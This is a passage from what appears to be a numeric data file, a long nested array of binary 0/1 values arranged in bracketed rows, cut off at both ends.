0,1,0,1,0,1,0,0,1,1,1,1,1,0,1,0,1,0,0,1,1,1,0,0,0,0,1,1,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,1,0,1,0,0,0,0,0,1,0,1,1,1,1,1,1,0,1,0,1,0,1,1,1,1,0,0,0,1,0,1,1,0,1,1,1,1,1,0,1,0,1,1,0,0,0,0,1,1,0,1,1,1,0,1,0],[1,0,0,1,1,0,0,1,1,0,1,0,1,1,1,0,1,1,0,0,0,0,1,1,1,0,1,1,1,1,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,0,0,1,1,1,0,0,1,0,1,0,1,1,1,0,0,0,0,1,1,0,0,1,0,1,1,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,1,1,0,0,1,0,0,1,0,0,0,1,0,1,0,0,1,1,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,1,1,0,0,1,1,0,1,1,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,0,0,0,1,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,1,1,0,1,0,1,0,0,1,0,1,0,1,1,0,0],[0,1,0,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,1,1,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,1,1,0,0,1,0,1,1,0,0,1,0,1,1,1,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,1,1,0,1,1,1,1,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,1,1,0,1,0,1,1,0,0,0,1,1,1,0,1,1,1,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,1,1,0,0,0,1,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,1,0,0,1,0,0,0,0,0],[0,1,1,1,0,0,1,0,1,1,0,0,1,1,1,1,1,1,0,1,0,1,0,1,0,0,1,0,0,1,0,0,0,1,0,1,1,0,1,0,1,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,1,0,1,1,1,1,1,0,1,0,0,1,0,1,1,0,0,1,0,1,1,0,0,1,0,0,1,0,0,1,1,0,1,1,1,0,1,0,0,0,0,1,0,1,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,1,0,0,1,1,0,0,0,1,1,1,1,1,0,0,1,0,1,0,0,1,0,1,1,1,0,1,0,0,0,0,0,1,1,1,0,1,1,0,0,1,0,1,0,1,1,1,0,1,0,0,0,1,0,0,1,0,0,0],[1,1,1,0,0,0,0,0,1,1,0,1,0,1,0,1,1,0,0,1,0,0,1,1,1,1,1,1,0,0,0,1,0,1,0,0,1,1,1,1,1,0,0,1,1,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,1,0,1,0,1,0,1,0,1,0,0,1,1,1,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,1,0,1,1,0,1,1,0,0,1,0,0,1,1,1,1,1,1,1,0,1,1,0,0,1,0,1,0,1,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,1,0,0,1,1,0,0,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,1,1,1,0,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,0,0,0],[0,1,0,0,1,0,0,1,1,0,0,0,0,1,1,1,0,0,1,0,0,0,0,1,1,0,0,0,1,1,1,1,1,0,0,1,0,0,0,1,1,1,1,1,1,1,0,0,0,1,1,1,1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,1,1,1,0,0,1,1,0,1,0,1,1,0,0,0,1,0,0,0,1,0,1,0,0,1,1,0,1,0,1,1,1,0,0,1,1,0,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,1,0,1,0,1,0,0,0,1,1,1,0,1,1,1,1,0,1,0,1,1,1,0,0,1,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,0,0,1,1,1,0,0],[0,0,0,0,0,0,1,0,0,0,0,1,1,1,1,1,1,0,1,1,1,1,0,0,0,1,0,1,1,0,0,0,1,0,1,1,0,1,0,0,1,0,0,0,1,0,1,1,0,0,1,1,1,0,0,0,1,1,0,1,1,0,1,1,0,1,0,1,1,0,1,0,1,0,1,1,0,1,0,0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,1,1,0,1,0,1,1,1,1,1,1,0,1,1,0,0,1,0,1,1,1,0,0,0,1,0,0,1,0,1,1,0,1,1,0,1,1,0,1,1,1,0,1,1,1,1,0,1,1,0,1,0,1,1,0,1,1,1,0,0,0,0,1,1,0,1,0,1,0,0,1,0,0,1,0,1,0,1,0,0,0,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,0,1,0,0,0,1],[1,0,0,0,1,0,0,1,1,1,0,0,1,1,0,1,0,1,1,0,1,1,1,0,1,1,1,0,0,1,1,1,1,0,1,1,1,1,1,1,0,0,1,1,1,0,0,1,0,0,1,1,0,0,1,1,1,0,0,1,1,0,0,1,1,1,0,1,1,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,0,1,0,1,1,0,0,1,0,0,0,1,1,1,1,1,1,0,1,0,1,0,0,1,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,1,0,1,0,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,0,1,0,1,1,1,1,0,1,1,0,0,0,0,0,0,0,1,0,1,0,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,0,0,1,0,1,1,0,0,1,0,0,1,1,1,1],[0,0,0,1,0,0,0,0,1,1,1,0,1,0,0,1,1,1,0,1,1,1,0,1,1,0,1,1,0,1,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,1,1,0,0,1,1,0,1,1,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,1,1,1,0,0,0,1,0,1,0,0,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,1,0,0,1,0,1,0,0,1,0,0,1,0,0,1,0,1,0,1,0,0,1,0,0,0,1,0,0,1,1,0,1,1,0,1,1,1,0,0,1,0,0,0,0,0,1,1,0,1,0,1,1,0,0,0,0,1,1,0,0,0,1,1,1,0,1,1,1,0,1,0,1,0,0,0,0,0,1,1,0,1,0,1,1,1,1,0,1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,0,1,1],[0,1,1,1,1,1,1,1,0,1,1,0,1,0,0,1,1,0,1,0,0,1,1,0,1,1,1,1,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,1,1,0,1,0,0,0,1,1,1,1,1,0,1,1,0,1,0,1,1,1,1,1,1,1,1,0,1,0,0,1,0,1,1,1,0,1,1,1,0,0,0,1,1,0,0,1,0,0,1,1,0,1,1,0,1,0,1,1,1,0,0,1,1,1,1,0,0,0,1,1,1,0,0,0,0,1,1,1,1,0,1,0,0,1,1,1,1,1,0,0,1,1,0,1,0,1,0,1,0,0,1,0,1,1,0,0,0,1,1,1,0,1,0,1,0,0,0,1,0,0,0,1,1,0,1,1,1,0,1,1,1,1,1,1,1,0,1,0,0,0,0,0,1,0,0,1,0,0,1,0,1,0,0,0,0,1,0,1,1],[0,1,0,1,1,0,0,1,1,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,1,0,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,0,1,0,1,1,1,1,1,0,0,1,0,0,0,0,1,1,1,1,0,1,0,0,0,0,0,1,1,0,0,1,1,0,1,0,0,0,0,1,1,0,1,0,0,1,1,0,0,1,0,0,1,0,1,0,1,1,1,0,0,1,1,0,0,1,1,1,1,1,1,0,0,1,1,0,1,1,1,0,0,0,0,0,1,1,0,1,1,1,0,1,1,0,1,0,0,0,1,0,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,0,0,1,0,1,0,1,1,0,0,1,1,1,0,1,0,1,0,0,0,1,1,0,1,1,1,1,1,1,0,1,0,0,0,0],[1,1,0,1,1,0,0,1,0,1,1,1,1,0,1,0,0,0,1,0,1,0,0,0,1,0,0,0,1,0,1,0,0,1,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,1,1,1,0,0,1,0,0,0,0,0,0,0,1,0,0,1,1,0,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,1,1,1,1,0,1,1,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,1,0,0,1,1,1,0,0,1,1,0,1,1,1,1,1,1,0,0,1,0,1,0,0,1,1,1,1,1,1,1,1,1,0,1,0,0,0,1,0,1,1,0,1,0,1,0,1,1,1,1,1,0,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,0,1,1,0,1,0,1,1,0,0,0,0,1,0,0,0,0,1,1,0],[0,0,1,1,1,0,0,0,0,0,1,1,0,0,1,1,0,1,1,1,1,1,1,0,0,1,1,1,1,0,1,0,0,1,1,0,0,1,0,0,1,1,1,0,1,1,0,1,1,0,0,1,1,1,1,0,0,1,0,1,1,0,1,1,0,0,0,1,1,0,0,1,0,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,1,1,1,1,0,0,1,0,1,0,0,1,0,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,1,0,0,0,1,1,0,1,0,0,0,0,0,1,1,0,0,1,1,1,0,1,0,1,1,0,0,0,0,1,1,1,0,1,1,0,0,1,1,1,1,1,1,0,1,1,1,0,0,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,1,1,0,1,1,1,0,0,1,0,0,1,1,0,1,1,0,1,1,0,0],[0,1,0,0,1,0,0,0,0,0,1,0,1,1,0,1,0,1,1,1,0,1,0,0,0,1,0,1,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,1,1,1,1,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,0,0,1,1,1,0,0,1,0,0,1,0,1,0,1,0,0,1,0,1,0,1,0,1,0,0,0,1,0,0,0,1,1,0,1,1,0,0,1,0,1,1,0,1,0,0,1,0,0,0,0,1,0,0,0,1,1,0,1,1,1,0,1,0,1,1,1,1,0,1,0,1,0,0,1,1,0,1,0,1,0,0,1,1,0,1,0,1,1,0,1,0,0,0,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,0,0,1,0,0,0,0,1,0,1,0,1,0,0,0,0,0,1,1],[1,0,0,0,1,0,1,1,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,1,1,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1,0,1,0,0,0,0,0,1,1,0,1,0,1,0,0,1,1,1,1,1,1,0,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,1,0,0,1,0,0,1,0,1,1,0,0,0,0,1,0,0,0,1,1,1,0,0,1,1,0,1,0,1,0,1,0,0,1,1,0,0,0,0,1,1,1,1,0,1,0,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,0,0,1,0,1,1,0,0,0,1,0,1,1,1,1,0,0],[0,0,0,1,0,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,1,1,1,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,1,0,1,0,1,1,1,1,0,1,1,0,0,1,0,0,1,0,1,0,1,1,1,0,0,1,1,0,1,0,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,1,0,0,1,1,0,0,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,0,1,0,1,0,1,1,0,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,1,0,1,1,0,0,1,0,0,0,1,1,1,0,1,1,0,1,1,1,0,1,0,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,1,0,1,0,0,1,1,0,1,0,0,0,1,0,1,0,1,0,1,1,0,1,0],[0,0,1,1,0,0,0,1,1,1,1,0,0,0,1,0,0,1,0,1,1,1,0,1,0,1,1,0,0,0,0,0,1,0,1,0,1,1,0,0,0,0,1,1,1,1,0,1,0,0,0,0,0,0,1,1,1,1,1,0,0,1,0,1,0,0,0,1,1,1,1,1,1,0,1,0,0,0,1,1,0,0,0,1,1,0,1,1,1,1,1,1,0,0,0,0,0,1,0,1,1,1,1,1,0,0,0,1,1,0,1,0,0,0,0,0,0,1,1,0,0,1,0,1,1,0,0,1,0,1,0,1,1,0,0,1,1,1,1,0,1,1,1,0,1,0,0,1,1,1,0,0,1,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,1,1,1,0,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,1,1,1,1,0,0,1,1,0,0,0],[1,1,1,0,0,0,1,1,0,1,0,1,1,0,0,1,0,0,1,0,1,0,1,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,1,0,1,1,0,1,0,1,1,1,0,0,0,0,1,1,0,0,1,0,0,1,0,1,0,0,0,0,0,1,0,1,0,1,1,1,0,0,0,1,1,0,0,1,1,0,1,0,0,0,1,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,1,1,1,1,0,1,0,1,1,1,1,0,1,0,1,0,1,0,0,1,1,0,0,1,1,1,0,0,0,1,0,1,0,1,0,0,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,1,1,1,1,0,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,0],[1,0,1,0,0,0,0,1,1,0,0,1,1,0,1,0,0,1,1,0,0,1,0,1,0,1,1,0,1,1,0,0,0,0,1,0,0,0,0,1,0,0,0,1,1,1,1,0,0,0,0,1,0,1,1,1,0,0,0,1,1,0,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,0,0,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,1,1,1,0,1,0,0,0,1,0,1,1,0,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,0,0,1,0,1,1,0,0,0,1,1,0,0,1,1,1,0,0,0,1,1,1,0,1,0,0,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,0,0,1,1,0,0,0,1],[0,1,0,1,1,1,1,1,0,0,1,1,1,1,1,1,0,1,0,1,1,0,1,0,1,1,0,0,0,1,0,0,0,0,1,1,1,1,1,1,1,0,0,0,1,1,0,0,1,0,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,1,0,1,1,1,1,0,1,1,1,0,1,1,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,0,1,1,0,0,0,0,1,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,0,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,1,0,1,0,0,0,0,1,1,1,0,0,1,1,1,0,1,0,1,0,0,1,1,1,1,1,0,0,1,0,0,1,1,0,1,1,0,0,1,1,0,1,0,1,0,0,1,0,0,0,0,0,1,1,0,1,1,1,0,0,1,0,1,1,1],[1,0,0,1,1,0,1,0,1,0,1,1,1,0,0,0,1,1,1,0,0,0,1,1,1,0,0,0,0,1,0,1,0,1,0,0,0,0,1,1,1,0,0,0,0,0,1,1,1,1,0,0,0,1,1,1,1,0,1,1,0,1,0,0,1,1,0,0,0,1,0,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,0,0,1,0,1,0,1,1,0,1,0,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,1,1,1,0,1,0,0,1,0,1,1,0,1,0,0,1,1,0,1,1,0,0,0,1,0,0,1,0,0,1,0,0,0,0,1,1,0,0,1,1,0,1,0,0,1,1,1,1,0,1,1,0,0,1,0,0,1,1,0,1,0,1,0,1,0,1,0,0,1,1,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,1],[1,0,1,0,1,0,1,1,0,0,0,0,1,0,1,0,0,1,0,0,0,0,0,1,0,0,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,1,1,0,1,0,1,0,0,1,1,0,0,0,0,1,0,0,0,0,1,0,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,0,1,1,0,0,0,0,0,1,1,1,0,1,1,0,0,1,0,1,1,0,0,0,1,0,0,1,1,0,1,1,0,0,1,1,1,1,0,0,0,1,1,0,1,0,1,0,0,0,0,0,1,1,0,1,0,1,0,0,1,1,1,0,0,1,0,1,1,1,0,0,1,0,0,0,1,1,0,1,0,1,0,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,1,0,1,0,1,1,0,0],[1,0,1,0,1,0,1,1,1,1,0,1,1,0,1,1,0,1,1,1,1,0,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,0,0,1,0,0,1,0,1,0,1,0,1,0,1,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,1,1,0,1,0,0,0,1,0,1,0,1,0,0,1,0,0,0,0,1,0,1,0,0,1,1,0,0,1,1,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,1,1,0,0,0,0,0,1,1,0,0,1,1,0,1,1,1,1,1,0,1,0,1,0,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,0,1,1,0,1,1,1,1,0,0,0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,1,0,0,0,1,0,1,1,1,0,1,1],[1,0,0,0,0,1,1,0,0,1,0,0,0,1,0,1,0,1,0,0,0,0,1,0,1,0,0,1,0,0,1,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,1,0,1,1,0,0,0,1,0,0,0,0,1,1,1,0,0,1,1,0,0,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,0,0,1,0,1,1,1,1,1,0,0,0,1,0,0,1,1,1,0,1,0,0,1,0,1,0,1,0,1,0,0,1,0,1,0,1,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,0,0,1,0,0,0,1,1,1,0,0,1,1,1,0,1,0,1,1,0,0,1,0,1,0,1,1,1,1,1,0,1,1,1,1,0,1,0,1,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,1,1,1,1,0,0,1,0],[1,0,1,0,1,1,0,1,1,0,1,0,1,1,0,1,0,0,0,1,0,0,0,0,1,1,0,1,1,1,0,1,1,1,1,0,0,1,1,1,1,0,1,0,1,0,0,1,0,1,0,0,1,0,1,1,1,1,0,0,1,0,1,0,1,1,0,0,0,1,1,0,0,1,1,0,1,0,0,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,1,0,0,0,1,1,0,1,1,1,1,1,0,1,1,0,1,1,1,0,0,0,1,1,0,0,0,1,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,1,1,0,1,1,0,0,1,1,0,0,0,1,1,0,0,0,0,1,1,0,1,1,1,0,0,1,0,1,1,1,1,1,1,0,0,1,0,0,1,0,0,0,1,1],[0,1,1,1,1,1,1,0,1,1,0,0,1,1,0,1,0,0,0,0,0,1,1,1,0,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,1,1,1,0,1,0,0,0,0,0,0,0,1,0,1,1,0,1,1,0,1,0,1,1,1,0,1,0,1,0,1,0,0,1,1,0,1,0,0,0,1,0,1,1,0,1,1,0,0,0,1,1,1,1,1,1,1,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,1,0,0,0,1,0,1,1,1,0,0,1,0,1,0,0,1,1,1,0,0,0,1,0,0,1,0,0,1,1,1,1,0,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,1,1],[1,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,1,0,0,0,0,1,0,0,0,0,1,1,0,0,1,1,0,0,0,0,1,1,1,0,0,1,1,0,0,1,1,1,1,1,0,1,1,1,1,0,0,1,1,0,1,1,0,0,0,0,1,0,1,0,1,1,0,1,1,1,0,1,1,0,0,1,1,1,1,0,1,0,1,0,1,1,0,0,1,1,0,1,0,0,0,1,1,1,0,1,0,1,0,1,1,1,1,0,1,0,0,1,0,1,1,0,1,1,0,0,0,0,0,0,0,1,1,1,0,1,0,0,1,1,1,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,0,1,0,0,1,0,1,1,0,0,0,0,0,1,1,0,1,0,1,1,0,1],[1,1,1,1,0,1,1,0,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,0,1,1,1,0,0,1,1,0,1,1,1,1,0,1,1,1,0,0,1,1,1,0,1,1,1,1,0,1,0,1,1,0,1,1,0,1,0,0,1,1,0,0,0,0,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,0,0,0,0,1,1,0,1,0,1,1,0,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,1,0,0,1,0,1,0,1,1,1,1,1,1,0,0,1,0,1,1,0,0,1,0,1,1,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,1,1,0,1,0,1,0,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,1,0,0,0,0,1,1,1,1,0,0],[0,1,0,0,1,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,1,1,0,0,0,0,0,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,0,1,1,1,0,0,1,1,1,0,1,1,1,0,0,1,1,0,1,0,1,0,0,0,0,0,1,0,0,0,0,1,1,1,1,1,0,1,0,1,1,0,1,1,1,1,1,1,1,0,0,1,1,1,1,1,0,0,1,1,1,1,0,0,1,0,1,0,1,1,0,0,0,1,1,0,0,0,0,0,1,0,1,1,0,0,0,1,1,0,0,1,1,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,0,1,1,0,1],[1,1,1,1,1,0,1,0,1,0,0,0,1,0,1,1,1,1,0,1,0,0,0,1,0,0,1,0,0,1,0,0,1,1,0,1,1,0,0,0,1,1,0,1,0,0,1,0,0,1,0,1,1,0,1,1,1,0,1,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,1,1,0,1,0,1,0,0,1,0,1,1,0,1,0,1,0,0,1,1,0,0,1,1,1,0,1,1,1,0,1,0,0,0,1,0,0,0,0,1,1,0,1,1,1,1,1,0,1,1,1,0,0,0,0,1,0,0,0,0,1,1,0,1,0,1,1,1,1,0,0,0,0,0,1,0,1,0,1,1,1,1,1,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,0,0,0,0,0,1,1,1,0,1,1,0,1,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0],[1,0,0,0,0,1,0,1,0,1,0,0,0,0,1,1,0,0,0,0,1,1,1,1,0,0,1,0,1,0,1,0,0,1,1,0,1,0,1,1,1,1,0,0,1,0,1,0,1,1,0,0,1,0,0,0,1,0,0,0,0,1,1,0,1,1,1,0,1,0,1,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,0,0,1,0,1,0,1,0,1,1,0,0,1,1,1,0,1,1,0,1,0,0,1,1,1,1,1,1,0,0,1,1,1,0,0,0,1,0,1,1,1,1,1,0,0,0,1,0,0,1,0,0,1,1,1,1,1,0,0,1,0,1,0,0,0,0,1,0,0,1,0,1],[0,1,1,0,1,1,0,0,1,1,1,1,1,0,1,0,1,1,1,0,0,0,0,1,0,0,0,0,1,0,1,0,1,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,1,1,0,1,0,1,1,1,1,1,0,0,0,1,1,0,1,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,1,1,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,0,0,1,0,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,1,0,1,0,0,1,0,0,1,0,1,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,1,1,0,1,0,1],[1,1,0,1,1,0,0,0,0,0,1,1,0,0,0,0,1,1,0,1,1,0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,1,1,1,0,1,0,0,1,0,1,1,1,1,0,1,1,1,1,0,1,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,0,0,1,0,0,0,1,0,1,0,0,0,1,1,1,1,0,1,0,1,0,1,1,1,1,0,0,0,0,1,1,0,1,0,0,1,0,0,0,1,0,1,0,1,1,0,0,1,1,0,1,0,1,0,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,0,1,0,1,1,0,0,1,1,0,0,0,0,0,1,0,0,1,0,1,0,1,1],[0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,1,0,1,1,0,0,0,1,0,1,1,0,1,1,1,1,1,0,1,1,0,1,1,0,1,0,1,1,0,0,0,1,1,0,1,1,0,0,0,1,0,1,0,1,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,0,1,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,1,1,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,1,0,1,0,0,1,0,1,0,1,1,1,0,1,1,1,0,1,1,1,1,0,0,0,0,1,0,1,0,1,1,1,0,0,1,1,1,0,0,1,1,1,1,0,1,0,1,1,1,0,0,1,0,1,1,1,1,1,1,1],[1,0,1,0,0,0,1,0,0,1,1,1,0,1,1,1,1,1,0,0,1,0,0,1,1,1,0,1,1,0,1,1,0,1,1,1,0,0,0,1,0,0,1,0,0,1,0,1,0,0,1,1,0,0,0,1,0,1,1,0,0,0,1,1,1,0,0,1,0,1,1,0,0,0,1,1,0,1,1,1,1,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,0,0,1,0,0,0,0,0,1,0,1,0,0,1,1,0,0,1,1,0,1,0,0,1,1,0,0,0,0,0,0,1,1,0,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,1,1,0,0,0,0,1,0,1,1,0,1,1,1,0,1,0,0,0,0,0,1,0,0],[1,1,0,0,0,0,0,1,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,1,0,0,1,0,1,0,0,0,0,1,1,1,0,0,0,1,1,1,0,1,1,0,1,1,1,0,1,1,1,0,1,1,0,0,0,0,1,0,1,0,1,1,0,1,1,1,0,1,0,1,0,1,1,0,1,1,1,0,1,0,0,1,1,1,0,1,1,0,1,0,0,0,1,1,0,0,0,0,1,0,1,0,0,0,1,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,1,0,1,1,1,0,1,0,0,1,1,0,1,0,1,0,0,1,1,0,0,1,0,1,1,0,0,0,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,1,0,1,1,1,1,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,1,0,1,1,1,1,1],[0,1,0,1,0,1,1,0,0,1,0,0,0,1,1,1,0,0,1,1,0,0,0,1,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,0,1,0,1,0,0,1,0,1,0,1,0,0,1,0,1,0,0,0,1,0,0,1,0,0,0,0,1,0,0,0,0,1,0,1,0,1,0,1,1,1,0,0,0,0,1,1,0,0,0,0,0,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,0,1,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,1,1,0,1,1,1,0,0,1,1,1,1,1,1,1,1,1,0,0,1,0,1,0],[1,0,0,0,1,0,1,0,0,1,1,0,0,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,1,0,1,0,1,1,0,1,1,1,1,1,0,0,0,1,1,0,0,1,1,0,1,0,1,1,1,0,0,1,1,1,0,1,0,0